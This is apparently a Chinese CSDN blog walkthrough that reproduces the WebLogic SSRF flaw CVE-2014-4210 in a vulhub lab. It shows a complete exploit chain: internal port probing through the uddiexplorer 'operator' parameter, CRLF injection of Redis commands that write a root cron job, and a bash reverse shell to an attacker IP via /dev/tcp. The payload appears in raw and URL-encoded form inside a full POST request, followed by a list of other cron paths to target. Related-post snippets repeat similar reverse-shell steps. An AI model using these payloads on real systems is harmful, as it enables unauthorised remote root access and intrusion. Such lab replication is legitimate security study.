Weblogic SSRF(CVE-2014-4210)漏洞复现

已于 2023-02-08 22:48:28 修改
阅读量559 收藏 1
点赞数
文章标签: 安全 数据库 php 网络安全 web安全
于 2023-02-06 21:40:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64583632/article/details/128908695
版权
文章详细描述了如何利用Weblogic中的一个高危SSRF漏洞进行内网扫描和攻击,通过构造特定HTTP请求,探测并攻击内网中的脆弱组件如Redis,演示了如何通过注入HTTP头触发Redis反弹shell,最终实现对目标系统的控制。
摘要由CSDN通过智能技术生成

1.漏洞描述

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

2.漏洞等级

高危

3.影响版本

weblogic 10.0.2 – 10.3.6版本

4.准备工具

VMware环境

vulhub 的weblogic漏洞环境

kali:192.168.175.144

Redis容器:172.22.0.2

5.漏洞复现

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们在brupsuite下测试该漏洞。

发现operator的值,是请求一个url, 访问一个可以访问的IP:PORT,如http://127.0.0.1:80,发现" but could not connect over HTTP to server: '127.0.0.1', port: '80'", 一个不存在的端口 ,不可连接

换成一个IP192.168.175.144:7001,查看返回,发现return一个错误

通过错误的不同,即可探测内网状态。

注入HTTP头,利用Redis反弹shell

我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*),我这边发现172.21.0.2:6739可以连通:

发送三条redis命令,将弹shell脚本写入/etc/crontab:

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.175.144/21 0>&1'\n\n\n\n"
 
config set dir /etc/        //把redis数据库目录改成/etc
 
config set dbfilename crontab  //在该目录下把反弹shell的命令写进crontab文件里
 
save

 进行url编码:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.175.144%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1

Host: 192.168.175.144:7001

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 426

Origin: http://192.168.175.144:7001

Connection: close

Referer: http://192.168.175.144:7001/uddiexplorer/SearchPublicRegistries.jsp

Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=pcpfjgqKz9mgmBbn331r6xGrsQhszNlGpbYMyvcQG0Jhm5v1Qp2H!-798273750

Upgrade-Insecure-Requests: 1

operator=http://172.21.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.175.144%2F21%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Atacoking&txtSearchname=&txtSearchkey=&rdoSearch=for&txtSearchfor=&selfor=Business+location&btnSubmit=Search

用kali监听21端口, 成功反弹:

最后补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件
tacokings
关注
SSRF漏洞复现(redis)
m0_56578216的博客
09-04 496
前提条件:1.安装环境已完成,故此省略不做。
Weblogic SSRF漏洞(CVE-2014-4210)
谢公子的博客
05-03 6386
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp页...
漏洞复现CVE-2014-4210(Weblogic ssrf)
deginner2的博客
07-28 1189
Weblogic 漏洞复现
ssrf漏洞之——漏洞复现
V_vevive的博客
08-25 543
6.发送三条redis命令,即可将弹shell的脚本写入/etc/crontab,之后将shell发送到指定的ip的一个端口,ip可自己更改,之后在192.168.16.131上使用nc监听4444端口,输入nc -lvvp 4444 开启监听。将url编码后的命令放到redis服务器的ip后(http://172.22.0.2:6379/命令),替换url发送,过一会nc处就会自动弹出一个控制172.22.0.2:6379的shell。将页面请求的url改为指定本地文件路径的url。
【vulhub】Weblogic_SSRF(CVE-2014-4210漏洞复现
qq_45300786的博客
04-12 326
这个真的不知道怎么回事,就是不能反弹shell,可能是我没有redis吧 还是直接放参考链接吧 https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md https://blog.csdn.net/LTtiandd/article/details/99592832 https://dyblogs.cn/dy/2275.html ...
Weblogic SSRF漏洞复现CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1598
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
linux uddi服务器,Weblogic SSRF漏洞复现CVE-2014-4210
weixin_39656174的博客
04-30 351
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。测试环境搭建编译及启动测试环境docker-compose up -d访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。SSRF漏洞测试SSRF漏洞存在于http://your-ip:7001/uddie...
Weblogic SSRF漏洞CVE-2014-4210
weixin_39664643的博客
01-25 1167
利用范围 版本10.0.2,10.3.6 原理 Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。 利用 漏洞靶场 编译及启动测试环境 docker-compose build docker-compose up -d 访问http
Weblogic_SSRF漏洞_CVE-2014-4210(未完待续)
simonnews的博客
05-25 899
Weblogic_SSRF漏洞_CVE-2014-42101 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他 1 漏洞概述 1.1 基础知识 什么是SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 1.2 漏洞
WebLogic SSRF 及漏洞修复
11-25
本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-2014-4210这一特定漏洞的修复方法。 #### 二、SSRF漏洞概述 SSRF漏洞通常出现在Web应用中,当应用未能正确地验证服务器响应时,攻击者可以利用这些漏洞绕...
SSRF漏洞复现
m0_57485346的博客
03-15 1297
ssrf漏洞复现
ssrf漏洞复现
m0_68533808的博客
08-25 358
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)
复现ssrf漏洞
最新发布
m0_68498873的博客
08-26 563
将生成的payload再次用url进行编码,然后发送过去,然后使用ssrf访问这个内网的upload/shell.php文件得到flag。因为Hostname是172.21.0.3,所以内网中不可能只有一台服务器,通过尝试发现172.18.0.2可能有web服务。2、写入任务计划 --反弹shell可以将服务器权限反弹给攻击者。所以我们也可以用dict来探测内网端口,主要用来探测这几大服务。通过bp扫描目录,发现有个upload目录,访问upload。1、fistcgi --发现后可以是用RCE。
Weblogic SSRF漏洞复现
K_ShenH的博客
06-24 1122
Weblogic SSRF漏洞
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
CVE-2014-4210WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tacokings

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值